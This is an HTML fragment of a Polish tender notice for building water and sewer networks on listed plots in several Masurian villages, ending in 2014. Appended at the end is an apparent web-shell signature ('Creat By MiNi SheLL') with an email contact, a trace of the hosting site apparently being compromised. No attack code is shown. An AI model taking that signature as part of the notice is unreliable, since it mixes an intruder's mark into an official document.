<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa sieci wodociągowej i kanalizacji sanitarnej w miejscowościach: 
Bogaczewo dz: 103/16, 103/17, 103/18, 103/19, 103/20, 103/21, 103/22, 103/23
Gajewo ul. Dębowa dz: 228, 229, 225/4, 234, 217/1, 249, 248, 230/2
Gajewo ul. Poleska dz: 53/7
Gajewo ul. Grzybowa, dz:  49/7, 49/8, 29, 25, 26, 21, 20/13, 20/14
Gajewo dz: 208/76, 208/83
Wrony dz: 8/2, 8/169, 8/187, 8/188, 8/189, 9/2, 9/7, 9/8, 9/9, 9/10, 9/18, 9/19, 10/15, 60, 66, 132
Sulimy dz: 193, 159/6
Sulimy dz: 193, 115/1, 115/2, 115/3
Sterławki Średnie dz: 1/49, 1/83, 1/84, 1/85, 1/86, 1/87, 1/88, 1/89, 1/90, 1/91, 1/92, 1/94, 1/95.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com